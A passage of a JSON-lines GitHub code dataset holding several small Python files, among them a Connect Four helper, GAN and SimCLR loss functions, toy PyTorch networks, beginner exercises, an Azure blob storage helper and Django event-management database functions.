POP(SPACE)3: \")\n uppercase = input_pop_or_drop.upper()\n uppercase_spliter = uppercase.split()\n if uppercase_spliter[0] != 'DROP' and uppercase_spliter[0] !='POP':\n continue\n\n return uppercase\n\n\ndef drop_or_pop_action(game_state, user_input) -> 'game_state':\n\n player_input_spliter = user_input.split()\n player_option = player_input_spliter[0].upper()\n player_column = int(player_input_spliter[1])-1\n\n if player_option == 'DROP':\n game_state = connectfour.drop(game_state, player_column)\n return game_state\n elif player_option == 'POP':\n game_state = connectfour.pop(game_state, player_column)\n return game_state\n\n\ndef who_won(game_state) -> None:\n if connectfour.winner(game_state) == connectfour.RED:\n print(\"Red is the winner\")\n elif connectfour.winner(game_state) == connectfour.YELLOW:\n print(\"Yellow is the winner\")","repo_name":"smallxdoggo/connectfour_project2","sub_path":"shared_functions.py","file_name":"shared_functions.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"73932694182","text":"import torch\n\ndef get_adversarial_loss(inputs, positive=True):\n def hinge_loss(X, positive=True):\n if positive:\n return torch.relu(1 - X).mean()\n else:\n return torch.relu(X + 1).mean()\n\n loss = 0\n for scores_map in inputs:\n loss += hinge_loss(scores_map, positive)\n return loss\n\ndef get_attribute_loss(z_att_x, z_att_y, batch_size=1):\n L_attr = 0\n\n for i in range(len(z_att_x)):\n L_attr += torch.mean(torch.pow(z_att_x[i] - z_att_y[i], 2).reshape(batch_size, -1), dim=1).mean()\n\n L_attr /= 2.0\n\n return L_attr\n\ndef get_identity_loss(z_id, z_Y_id):\n return (1 - torch.cosine_similarity(z_id, z_Y_id, dim=1)).mean()\n\ndef get_reconstruction_loss(Y, X_t, same_person, batch_size=1):\n return torch.sum(0.5 * torch.mean(torch.pow(Y - X_t, 2)\\\n .reshape(batch_size, -1), dim=1) * same_person)\\\n / (same_person.sum() + 1e-6)\n\n\ndef get_generator_loss(fake_discr_scores, Z_att, Z_Y_att,\n Z_id, Z_Y_id, Y, X_t, same):\n\n\n adversarial_loss_g = get_adversarial_loss(fake_discr_scores, positive=True)\n\n attribute_loss = get_attribute_loss(Z_att, Z_Y_att)\n\n identity_loss = get_identity_loss(Z_id, Z_Y_id)\n\n reconstruction_loss = get_reconstruction_loss(Y, X_t, same)\n\n loss_g = 1 * adversarial_loss_g + 10 * attribute_loss +\\\n 5 * identity_loss + 10 * reconstruction_loss\n\n losses = {\"adversarial_loss_g\": adversarial_loss_g,\n \"attribute_loss\": attribute_loss,\n \"identity_loss\": identity_loss,\n \"reconstruction_loss\": reconstruction_loss,\n \"loss_g\": loss_g}\n\n return loss_g, losses\n\ndef get_discriminator_loss(fake_discr_scores, true_discr_scores):\n adversarial_loss_d_fake = get_adversarial_loss(fake_discr_scores,\n positive=False)\n adversarial_loss_d_true = get_adversarial_loss(true_discr_scores,\n positive=True)\n loss_d = 0.5 * (adversarial_loss_d_fake + adversarial_loss_d_true)\n\n losses = {\"adv_loss_d_fake\": adversarial_loss_d_fake,\n \"adv_loss_d_true\": adversarial_loss_d_true,\n \"loss_d\": loss_d}\n\n return loss_d, losses\n","repo_name":"Olksndr/FaceShifter","sub_path":"model/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30996456611","text":"\nimport os, sys\nfrom distutils.core import setup\nfrom os.path import 
join\n\n_rpmVersion='__version__'\n_name='__packagename__'\n_author='__author__'\n_author_email=''\n_description='__description__'\n_url='__url__'\n_module='__module__'\n\n\nsetup(name=_name,\n version = _rpmVersion,\n description = _description,\n author = _author,\n author_email = _author_email,\n url = _url,\n\n packages = [_module],\n package_dir = {'' : ''},\n package_data = {_module : ['*.so']}\n\n )\n\n","repo_name":"kreczko/swatch","sub_path":"config/setupTemplate.py","file_name":"setupTemplate.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25050160508","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\ntorch.manual_seed(2)\n\n\nclass two_layer_flat(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim=2, output_dim=1):\n\t\tsuper(two_layer_flat, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim)\n\t\tself.lin2 = nn.Linear(hid_dim, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.fill_(1)\n\t\t\t\tm.bias.data.fill_(0)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = self.lin2(x)\n\t\treturn x\n\n\nclass two_layer_sigmoid(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim=2, output_dim=1):\n\t\tsuper(two_layer_sigmoid, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim)\n\t\tself.lin2 = nn.Linear(hid_dim, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = torch.Tensor(x)\n\t\tx = self.lin1(x)\n\t\tx = torch.sigmoid(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.sigmoid(x)\n\t\treturn x\n\n\nclass two_layer_relu(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim=2, output_dim=1):\n\t\tsuper(two_layer_relu, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim)\n\t\tself.lin2 = nn.Linear(hid_dim, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = torch.relu(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.relu(x)\n\t\treturn x\n\n\nclass three_layer_sigmoid(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim_1=2, hid_dim_2=2, output_dim=1):\n\t\tsuper(three_layer_sigmoid, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim_1)\n\t\tself.lin2 = nn.Linear(hid_dim_1, hid_dim_2)\n\t\tself.lin3 = nn.Linear(hid_dim_2, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = torch.sigmoid(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.sigmoid(x)\n\t\tx = self.lin3(x)\n\t\tx = torch.sigmoid(x)\n\t\treturn x\n\n\nclass three_layer_relu(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim_1=2, hid_dim_2=2, output_dim=1):\n\t\tsuper(three_layer_relu, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim_1)\n\t\tself.lin2 = nn.Linear(hid_dim_1, hid_dim_2)\n\t\tself.lin3 = nn.Linear(hid_dim_2, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = torch.relu(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.relu(x)\n\t\tx = self.lin3(x)\n\t\tx = torch.relu(x)\n\t\treturn x\t\n\ndef train(model, x, y, epochs=5, lr=1, 
momentum=0.9):\n\tX = torch.Tensor(x)\n\tY = torch.Tensor(y).type(torch.LongTensor)\n\tloss_func = nn.CrossEntropyLoss()\n\toptimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum)\n\tsteps = X.size(0)\n\tfor i in range(epochs):\n\t\tfor j in range(steps):\n\t\t\tdata_point = np.random.randint(X.size(0))\n\t\t\tx_var = Variable(X, requires_grad=False)\n\t\t\ty_var = Variable(Y, requires_grad=False)\n\n\t\t\toptimizer.zero_grad()\n\t\t\ty_hat = model(x_var)\n\n\t\t\tloss = loss_func(y_hat, y_var)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\t\n\t\tprint(\"Epoch: {0}, Loss: {1}, \".format(i, loss.data.numpy()))\n\n\ndef test(model, X, Y):\n\tcorrect = 0\n\tfor index in range(len(X)):\n\t\ty = model(X[index])\n\t\tresult = [0 if not i == max(y) else 1 for i in y]\n\t\tif result.index(1) == Y[index]:\n\t\t\tcorrect += 1\n\n\tprint(\"corrected {0}/{1}, a ratio of {2}.\".format(correct, len(X), correct/len(X)))\n\n\n# A = torch.Tensor([1,2,3])\n# print(F.softmax(A, dim=0))\n\n","repo_name":"Emericen/5522Lab-4","sub_path":"component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"41732539828","text":"import math\n\nfrom sympy import isprime\n\n\ndef printGreeting():\n print(\"Hello World!\")\n\n\ndef printZ():\n print(\"*****\")\n print(\" *\")\n print(\" *\")\n print(\" *\")\n print(\"*****\")\n\n# Grading System--------------------------------------\n\n\ndef gradingSystem(marks):\n if (marks > 90):\n print(\"excellent\")\n elif (marks > 80):\n print(\"print good\")\n elif (marks > 70):\n print(\"fair\")\n elif (marks > 60):\n print(\"meets expectations\")\n else:\n print(\"below par\")\n\n\ndef gradingSystem():\n marks = input()\n gradingSystem(int(marks))\n\n# Odd-Even--------------------------------------------\n\n\ndef isEven(num):\n if (num % 2 == 0):\n return True\n else:\n return False\n\n\ndef ifOdd(num):\n return (True if(num % 2 != 0) else False)\n\n# calc-----------------------------------------------------\n\n\ndef calculator_(num1, num2, operator):\n if (operator == '+'):\n return num1 + num2\n elif (operator == '-'):\n return num1 - num2\n elif (operator == '*'):\n return num1 * num2\n else:\n return \"Invalid Input\"\n\n\ndef calculator():\n num1 = int(input())\n num2 = int(input())\n operator = input()\n\n print(calculator_(num1, num2, operator[0]))\n\n\n# prime Number----------------------------------------------\n\ndef isPrimeNumber(num):\n i = 2\n while i * i <= num:\n if(num % i == 0):\n return False\n i += 1\n\n return True\n\n\ndef printAllPrimeNumbers():\n x = int(input())\n y = int(input())\n\n for num in range(x, y + 1):\n if(isPrimeNumber(num)):\n print(num)\n\n\n# Leetcode 509------------------------------------------------\n\ndef printFibo(n):\n a = 0\n b = 1\n for i in range(n):\n # print(a)\n sum = a + b\n a = b\n b = sum\n\n return a\n\n# Bulb_problem-------------------------------------------------\n\ndef bulbToggle(num):\n i = 1\n while i * i <= num:\n print(i)\n\n","repo_name":"rajneeshkumar146/AlmaBetter","sub_path":"lecture_001/T001_basics.py","file_name":"T001_basics.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"15973968790","text":"from tkinter import *\n\nclass MyFirstGUI:\n def __init__(self, master):\n self.master = master\n master.grid()\n self.label = Label(master, text=\"This is our first GUI!\")\n 
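# grid() with no arguments defaults to column 0 and the next free row, so\n        # successive calls stack the widgets vertically.\n        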
self.label.grid()\n\n self.greet_button = Button(master, text=\"Greet\", command=self.greet)\n self.greet_button.grid()\n self.count=0\n self.close_button = Button(master, text=\"Close\", command=self.master.destroy)\n self.close_button.grid()\n\n def greet(self):\n #print(\"Greetings!\")\n self.count+=1\n self.greet_button[\"text\"]=\"Clicked:\",self.count,\" times\"\n\nroot = Tk()\nfra1=Frame(root)\nroot.title(\"A simple GUI\")\nroot.geometry(\"400x400\")\nmy_gui = MyFirstGUI(fra1)\nroot.mainloop()\n","repo_name":"obedjunias/1BM17CS055-PIP","sub_path":"Misc/MATERIALS/PIP Programs/tkinter/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34089889295","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\n\r\n\r\nclass SimCLR_Loss(nn.Module):\r\n def __init__(self, batch_size, temperature):\r\n super().__init__()\r\n self.batch_size = batch_size\r\n self.temperature = temperature\r\n\r\n self.mask = self.mask_correlated_samples(batch_size)\r\n self.criterion = nn.CrossEntropyLoss(reduction=\"sum\")\r\n self.similarity_f = nn.CosineSimilarity(dim=2)\r\n\r\n def mask_correlated_samples(self, batch_size):\r\n N = 2 * batch_size\r\n mask = torch.ones((N, N), dtype=bool)\r\n mask = mask.fill_diagonal_(0)\r\n \r\n for i in range(batch_size):\r\n mask[i, batch_size + i] = 0\r\n mask[batch_size + i, i] = 0\r\n return mask\r\n\r\n def forward(self, z_i, z_j):\r\n\r\n N = 2 * self.batch_size\r\n\r\n z = torch.cat((z_i, z_j), dim=0)\r\n #print(z)\r\n #print(z.unsqueeze(1).size()) #200x1x512\r\n #print(z.unsqueeze(0).size()) #1x200x512\r\n\r\n sim = self.similarity_f(z.unsqueeze(1), z.unsqueeze(0)) #/ self.temperature #200x200\r\n\r\n sim_i_j = torch.diag(sim, self.batch_size)\r\n sim_j_i = torch.diag(sim, -self.batch_size)\r\n \r\n # We have 2N samples, but with Distributed training every GPU gets N examples too, resulting in: 2xNxN\r\n positive_samples = torch.cat((sim_i_j, sim_j_i), dim=0).reshape(N, 1) #200x1\r\n \r\n arrPos = []\r\n arrNeg = []\r\n for i in range(100):\r\n pos = positive_samples[i][0].tolist()\r\n arrPos.append(pos) \r\n \r\n print(arrPos)\r\n \r\n negative_samples = sim[self.mask].reshape(N, -1) #200x198\r\n minNegSamples = torch.max(negative_samples, 1)\r\n minNegSamples = minNegSamples[0]\r\n \r\n for i in range(100):\r\n neg = max(minNegSamples[i], minNegSamples[i+100]).tolist() \r\n arrNeg.append(neg) \r\n print(arrNeg) \r\n \r\n #SIMCLR\r\n labels = torch.from_numpy(np.array([0]*N)).reshape(-1).to(positive_samples.device).long() #.float()\r\n \r\n logits = torch.cat((positive_samples, negative_samples), dim=1)\r\n loss = self.criterion(logits, labels)\r\n loss /= N\r\n \r\n return arrPos, arrNeg","repo_name":"subhobose/contssl1","sub_path":"SIMCLR.py","file_name":"SIMCLR.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"14713192690","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport pylab as pl\nimport itertools \nfrom statsmodels.iolib.smpickle import load_pickle\nfrom sklearn.metrics import accuracy_score\nfrom sklearn import linear_model, decomposition, datasets \nimport numpy as np\nimport random \nimport json\n \n\n\nCRITERIA = {\"DebtRatio\":[(\"less than 50%\",0,.5),(\"less than 100%\",5,1),(\"less than 5 times\",1,5),(\"less than 10 times\",5,10),(\"more than 10 
times\",10,float(\"inf\"))]}\nY_VARIABLE = 'SeriousDlqin2yrs'\n\ndef read_csv(filename):\n\t'''\n\tRead a csv and return a datafile \n\t'''\n\tdata_file = pd.read_csv(filename)\n\n\treturn data_file\n\n\ndef obtain_basic_statistics(data_file):\n\t'''\n\tProvide descriptive statistics and save them in\n\ta csv\n\t'''\n\tstats = data_file.describe().round(2)\n\tmissing_data = data_file.iloc[0,:].apply(lambda x : len(data_file) - x)\n\tmissing_data.name = \"missing values\"\n\tstats = stats.append(missing_data)\n\tstats.to_csv(\"descriptive_statistics.csv\")\n\n\ndef generate_histogram(data_file):\n\t'''\n\tGenerate histogram graphs and save them in png files\n\t'''\n\tfor variable in data_file.describe().keys():\n\t\thistograms = data_file[variable].hist(figsize=(15, 10))\n\t\tplt.savefig(variable+\"_histogram.png\", bbox_inches = \"tight\")\n\t\tplt.close()\n\ndef generate_correlations(data_file):\n\tcorrelations = data_file.corr()\n\tcorrelations.to_csv(\"correlations.csv\")\n\n\tfor x in data_file.describe().keys():\n\t\tfor y in [i for i in data_file.describe().keys() if i != x]:\n\t\t\tplt.scatter(data_file[x],data_file[y])\n\t\t\tplt.xlabel(x)\n\t\t\tplt.ylabel(y)\n\t\t\tplt.savefig(x+\"-\"+y+\"_histogram.png\", bbox_inches = \"tight\")\n\t\t\tplt.close()\n\n\ndef preprocess_data(data_file, method, list_grouping = []):\n\t'''\n\tFill in missing values \n\t'''\n\tif method == \"A\":\n\t\tdata_file = data_file.fillna(data_file.mean())\n\n\tif method == \"B\":\n\t\tl2 = itertools.combinations(list_grouping,2)\n\t\tlist_grouping += l2 \n\t\tfor variable in list_grouping:\n\t\t\tdata_file.fillna(datafile.groupby(variable).transform(\"mean\"), inplace = True)\n\n\tdata_file.to_csv(\"clean_database.csv\")\n\treturn data_file\n\n\ndef generate_discrete_variable(data, criteria_dict):\n\t'''\n\tWrite a sample function that can discretize a continuous variable \n\t'''\n\t#Generate categorical values from continous variable \n\tfor column, criteria in criteria_dict.items():\n\t\t#The parameter list contains the labels\n\t\tparameter_list = []\n\t\t#The range set contains the values for the different parameters\n\t\trange_set = set()\n\t\tfor parameter in range(len(criteria)):\n\t\t\tparameter_list.append(criteria[parameter][0])\n\t\t\trange_set.add(criteria[parameter][1])\n\t\t\trange_set.add(criteria[parameter][2])\n\n\t\trange_list = list(range_set)\n\t\trange_list.sort()\n\n\t\t#Generate categorical variables, the \"right\" option\n\t\t#creates set [a,b) to satisfy greater or equal restriction\n\t\t#for lower limit. 
\n\t\tdata[column] = pd.cut(data[column],range_list,\n\t\t\t\t\t\tright = False, labels = parameter_list)\n\t\t\n\t\t#Drop rows that did not have a categorical match\n\t\tdata = data[~data[column].isnull()]\n\n\treturn data \n\ndef generate_continous_variable(data, variable_list):\n\t'''\n\tfunction that can take a categorical variable and create \n\tbinary variables from it\n\t'''\n\tfor variable in variable_list:\n\t\tlist_values = list(data.groupby(variable).groups.keys())\n\t\tfor i,value in enumerate(list_values):\n\t\t\tdata[variable].replace(value,i)\n\n\treturn data \n\n\ndef build_logistic_classifier(data, y_variable, x_variables, model_numbers):\n\t'''\n\tWrite a sample function that can discretize a continuous variable \n\tand one function that can take a categorical variable and create \n\tbinary variables from it.\n\t'''\n\tmodel_list = []\n\tfor i in range(len(x_variables)):\n\t\tif i < len(x_variables) - 1:\n\t\t\trun_list = list(itertools.combinations(x_variables,i+2))\n\t\t\tmodel_list += run_list\n\t\n\tmodel_list = random.sample(model_list,model_numbers)\n\tmodel_list = [list(x) for x in model_list]\n\n\tgeneral_results = np.array([str(y_variable)])\n\tgeneral_results = np.append(general_results,data[y_variable])\n\tgeneral_results = general_results.reshape((-1,1))\n\tfor i, model_variable in enumerate(model_list):\n\t\tprint(i,model_variable)\n\t\tlogit = sm.Logit(data[y_variable], data[model_variable])\n\t\tresult = logit.fit()\n\t\tresult.save(str(i)+\"_results.pickle\")\n\t\theader = np.array([str(model_variable)])\n\t\tmodel_result = np.append(header, result.predict())\n\t\tmodel_result = model_result.reshape((-1,1))\n\t\tgeneral_results = np.append(general_results,model_result, axis = 1)\n\n\t\n\tnp.savetxt(\"predictions.csv\", general_results, fmt = \"%s\", delimiter=\"|\")\n\n\ndef evaluate_classifier(predictions_file):\n\tpredictions = pd.read_csv(predictions_file, delimiter = \"|\" )\n\taccuracy_dict = {}\n\tfor variable in predictions.columns:\n\t\tscore = accuracy_score(predictions.iloc[:,0],predictions[variable])\n\t\taccuracy_dict[variable] = score\n\n\tjson.dumps(accuracy_dict)\n\treturn accuracy_dict\n\n\n\n","repo_name":"cgrandet/machine_learning-cgrandet","sub_path":"PA2/ML_H2.py","file_name":"ML_H2.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"73605944105","text":"class Solution(object):\n def smallerNumbersThanCurrent(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n sort_num = sorted(nums)\n hashmap = {}\n for i in range(len(sort_num)):\n if sort_num[i] not in hashmap:\n hashmap[sort_num[i]] = i\n result = []\n for n in nums:\n result.append(hashmap[n])\n return result","repo_name":"yichenfromhyrule/LeetCode","sub_path":"#1365_HowManyNumbersAreSmallerThanTheCurrentNumber.py","file_name":"#1365_HowManyNumbersAreSmallerThanTheCurrentNumber.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37405852297","text":"from azure.storage.blob import BlockBlobService, PublicAccess\n\n# Initializes Blob Storage Service\ndef InitializeBlobService(config):\n service = BlockBlobService(account_name=config['ACCOUNTNAME'], account_key=config['KEY'])\n return service\n\n# Uploads file to Blob Storage\ndef uploadFile(config,service,filename,f):\n try:\n service.create_blob_from_path(config['CONTAINER'], filename, f)\n print(\"File 
uploaded to blob storage.\")\n except Exception as e:\n print(e)\n\n# Gets file from Blob Storage and stores it locally\ndef getFile(config,service,filename,path):\n try:\n service.get_blob_to_path(config['CONTAINER'], filename, path)\n print(\"File retrieved from blob storage.\")\n except Exception as e:\n print(e)\n","repo_name":"Kagigz/python-doc-extraction","sub_path":"FunctionApp/FunctionProject/shared_code/storageHelper.py","file_name":"storageHelper.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"11404323056","text":"import sys\n\nvalid=0\nfor line in open(sys.argv[1]):\n\tcontent=line.strip().split()\n\tminimum=int(content[0].split(\"-\")[0])\n\tmaximum=int(content[0].split(\"-\")[1])\n\tletter=content[1].split(\":\")[0]\n\tseq=content[-1]\n\tif seq[minimum-1] == letter and not seq[maximum-1] == letter:\n\t\tvalid+=1\n\tif not seq[minimum-1] == letter and seq[maximum-1] == letter:\n\t\tvalid+=1\n\t\n\nprint(valid)\n","repo_name":"J35P312/AoC2020","sub_path":"Jesper/d2/d2_2.py","file_name":"d2_2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19817268540","text":"import numpy as np\nimport csv\nfrom pandas import read_csv\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nwith open('cancer-data.csv') as f:\n raw_data = f.read()\n\n####PREPROCESS OF THE DATASET######\ndef data_preprocess(raw_data):\n # Read string files\n dataset = list()\n csv_reader = csv.reader(raw_data.split('\\n'), delimiter=',')\n for row in csv_reader:\n if not row:\n continue\n dataset.append(row)\n pd_data = pd.DataFrame(dataset)\n\n labels = pd_data.iloc[:,-1].values\n labels = labels[:, np.newaxis]\n #CONVERTING TEXT CLASS LABELS TO NUMBERS\n b, c = np.unique(labels, return_inverse=True)\n labels = c[:, np.newaxis] + 1\n labels = pd.DataFrame(labels)\n #delete last column from dataframe\n pd_data.drop(pd_data.columns[len(pd_data.columns)-1], axis=1, inplace=True)\n #concatenate data with numerical class labels\n result = pd.concat([pd_data, labels], axis=1)\n \n\n #replace question marks with NaN\n result = result.replace(['?', '-'], np.nan)\n # drop rows with missing values\n result = result.dropna()\n\n dataset = result.values\n dataset = np.array(dataset).astype(np.float)\n\n # Find the min and max values for each column\n stats = [[min(column), max(column)] for column in zip(*dataset)]\n\n # Rescale dataset columns to the range 0-1 - normalization\n for row in dataset:\n for i in range(len(row)-1):\n row[i] = (row[i] - stats[i][0]) / (stats[i][1] - stats[i][0])\n return dataset\n\n\n#def data_preprocess2(filename):\n#\t# Load a CSV file\n#\tdataset = read_csv(filename, header=None)\n#\t# mark zero values as missing or NaN\n#\tdataset[[1,2,3,4,5,6,7,8,9]] = dataset[[1,2,3,4,5,6,7,8,9]].replace('?', np.NaN)\n#\t# drop rows with missing values\n#\tdataset.dropna(inplace=True)\n#\tdataset = np.array(dataset).astype(float)\n#\tdataset = np.delete(dataset, 0, axis=1)\n#\tprint (dataset.shape)\n#\n#\t# Find the min and max values for each column\n#\tstats = [[min(column), max(column)] for column in zip(*dataset)]\n#\n#\t# Rescale dataset columns to the range 0-1 - normalization\n#\tfor row in dataset:\n#\t\tfor i in range(len(row)-1):\n#\t\t\trow[i] = (row[i] - stats[i][0]) / (stats[i][1] - stats[i][0])\n#\n#\tfor i, data in enumerate(dataset):\n#\t\tif data[-1] == 
2:\n#\t\t\tdata[-1] = 0\n#\t\tif data[-1] == 4:\n#\t\t\tdata[-1] = 1\n#\n#\tdataset = dataset[np.argsort(dataset[:, -1])]\n#\treturn dataset\n\n#np.set_printoptions(threshold=np.inf)\n\ndataset = data_preprocess(raw_data)\ndataset = dataset[dataset[:,1].argsort()]\n#print(dataset)\n#print (dataset.shape)\n#count the number of classes\nnumClasses = len(np.unique(dataset[:,-1]))\n#print(numClasses)\n#exit()\n#train, test = train_test_split(dataset, test_size=0.2)\n","repo_name":"afalak94/Radial-Basis-Function-Neural-Network","sub_path":"RBFN_bash/Cancer_preprocess.py","file_name":"Cancer_preprocess.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19972879585","text":"from event_handler.models import Event, Stage, StageStaff, StageParticipants, Venue\nfrom creator_handler.models import StageSettings\nfrom user_handler.models import DjangoUser, User\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom enum import Enum\n\nfrom event_handler.db_controller import get_user_by_django_user, get_stages_by_event, get_event_by_id\n\n\ndef get_participants_by_event(event: Event):\n stage = get_stages_by_event(event).first()\n return StageParticipants.objects.filter(stage=stage)\n\n\ndef get_staff_by_event(event: Event):\n stage = get_stages_by_event(event).first()\n return [] if stage.users is None else stage.users\n\n\nclass SettingsSet(Enum):\n EDIT_VENUES = 1\n ACCEPT_APPLICATIONS = 2\n MANAGE_MAILING_LIST = 3\n\n\ndef get_venues_by_event(event_id: int):\n return Venue.objects.filter(parental_event_id=event_id)\n\n\ndef get_venue_by_id(venue_id: int):\n return Venue.objects.get(id=venue_id)\n\n\ndef get_venue_by_id_dict(venue_id: int):\n try:\n venue = get_venue_by_id(venue_id)\n except ObjectDoesNotExist:\n venue = {}\n except Exception as e:\n print(e)\n venue = {}\n return venue\n\n\ndef user_have_access(django_user: DjangoUser, event_id: int, setting=-1) -> bool:\n user = get_user_by_django_user(django_user)\n try:\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n staff = StageStaff.objects.get(user=user, stage=stage)\n setting_rule = 0\n if setting == SettingsSet.EDIT_VENUES:\n setting_rule = stage.settings.who_can_edit_venues\n elif setting == SettingsSet.ACCEPT_APPLICATIONS:\n setting_rule = stage.settings.who_can_accept_applications\n elif setting == SettingsSet.MANAGE_MAILING_LIST:\n setting_rule = stage.settings.who_can_manage_mailing_list\n return staff.status == StageStaff.Status.ACCEPTED and staff.role >= setting_rule\n except ObjectDoesNotExist:\n return False\n\n\ndef create_venue(name: str, address: str, region: int, participants_maximum: int, contacts: str, event_id: int) -> None:\n try:\n Venue.objects.create(\n name=name,\n address=address,\n region=region,\n participants_maximum=participants_maximum,\n parental_event=get_event_by_id(event_id),\n contacts=contacts,\n )\n except Exception as e:\n print(e)\n\n\ndef edit_venue(name: str, address: str, region: int, participants_maximum: int, contacts: str, venue_id: int) -> None:\n try:\n venue = Venue.objects.filter(id=venue_id).update(\n name=name,\n address=address,\n region=region,\n participants_maximum=participants_maximum,\n contacts=contacts,\n )\n except Exception as e:\n print(e)\n\n\ndef is_venue_attached_to_event(event_id: int, venue_id: int) -> bool:\n try:\n venue = get_venue_by_id(venue_id)\n return venue.parental_event.id == event_id\n except ObjectDoesNotExist:\n return False\n\n\ndef 
register_on_event(event_id: int, venue_id: int, user: User):\n    stage = get_stages_by_event(get_event_by_id(event_id)).first()\n    venue = get_venue_by_id(venue_id)\n    if not is_venue_attached_to_event(event_id, venue_id):\n        raise ValueError\n\n    participation = StageParticipants.objects.get_or_create(stage=stage, user=user)[0]\n    participation.role = StageParticipants.Roles.PARTICIPANT\n    participation.status = StageParticipants.Status.ACCEPTED\n    participation.venue = venue\n    participation.save()\n\n\ndef make_record_event(name, description):\n    event = Event.objects.create(name=name, description=description)\n    return event\n\n\ndef make_record_stage(name, event, preview, time_start, time_end, description):\n    stage = Stage.objects.create(\n        name=name,\n        parent=event,\n        preview=preview,\n        time_start=time_start,\n        time_end=time_end,\n        description=description,\n        settings=StageSettings.objects.create(),\n    )\n    return stage\n\n\ndef create_staff(user, stage, role, status=Stage.Status.WAITING):\n    StageStaff.objects.create(user=user,\n                              stage=stage,\n                              role=role,\n                              status=status)\n\n\ndef reject_participant(user: User, event_id: int):\n    try:\n        stage = get_stages_by_event(get_event_by_id(event_id)).first()\n        StageParticipants.objects.filter(user=user, stage=stage).update(status=StageParticipants.Status.REJECTED)\n        return True\n    except ObjectDoesNotExist:\n        return False\n\n\ndef accept_participant(user: User, event_id: int):\n    try:\n        stage = get_stages_by_event(get_event_by_id(event_id)).first()\n        StageParticipants.objects.filter(user=user, stage=stage).update(status=StageParticipants.Status.ACCEPTED)\n        return True\n    except ObjectDoesNotExist:\n        return False\n\n\ndef ban_participant(user: User, event_id: int):\n    try:\n        stage = get_stages_by_event(get_event_by_id(event_id)).first()\n        StageParticipants.objects.filter(user=user, stage=stage).update(status=StageParticipants.Status.BANNED)\n        return True\n    except ObjectDoesNotExist:\n        return False\n\n\ndef get_event_partcipants(event_id: int):\n    stage = get_stages_by_event(get_event_by_id(event_id)).first()\n    return StageParticipants.objects.filter(stage=stage)\n","repo_name":"hsse-distributed-events-team/distributed-events","sub_path":"creator_handler/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"36120820473","text":"\"\"\"\nText Content 